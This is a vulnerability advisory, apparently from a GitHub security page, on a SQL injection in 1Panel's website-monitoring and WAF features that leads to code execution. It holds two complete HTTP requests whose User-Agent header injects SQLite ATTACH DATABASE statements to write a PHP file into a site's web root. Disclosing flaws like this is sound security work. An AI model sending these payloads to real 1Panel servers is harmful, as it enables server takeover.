1Panel panel frontend SQL injection to website functionality RCE vulnerability

0x1 测试版本

专业版 v1.10.10-lts
社区版 v1.10.10-lts
1panel/openresty:1.21.4.3-3-1-focal

0x2 影响范围

网站监控功能影响 == 1panel/openresty:1.21.4.3-3-1-focal
WAF功能影响 <= 1panel/openresty:1.21.4.3-3-1-focal

0x3 题外话

具体测试/发现过程在 https://blog.mo60.cn/index.php/archives/1Panel_SQLinjection2Rce.html 有兴趣的大佬们可以看看

0x4 网站监控功能GetShell

利用条件:

专业版,并开启网站监控功能
关闭waf功能
安装有1P-openresty容器且搭建有php环境网站

默认网站路径格式如下，这个路径是在op容器里面的路径

/www/sites/网站代号(默认为域名)/index/

通过sql注入导出文件到网站路径下

GET / HTTP/1.1
Host: 192.168.99.6
User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5("blog.mo60.cn"); ?>');#

然后来到网站路径下可以看到我们写入的文件

访问发现成功输出blog.mo60.cn 的md5值，成功执行代码

0x5 Waf功能

利用条件:

开启waf功能
安装有1P-openresty容器且搭建有php环境网站

发送后即可成功写入文件

GET /.git/config HTTP/1.1
Host: 192.168.99.6
User-Agent: blog.mo60.cn',"args", "sqlInjectA", "", "YmxvZy5tbzYwLmNu", "blog.mo60.cn", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5("blog.mo60.cn"); ?>');#
Connection: close

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

1Panel panel frontend SQL injection to website functionality RCE vulnerability

Package

Affected versions

Patched versions

Description

0x1 测试版本

0x2 影响范围

0x3 题外话

0x4 网站监控功能GetShell

0x5 Waf功能

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

CVE ID

Weaknesses

Credits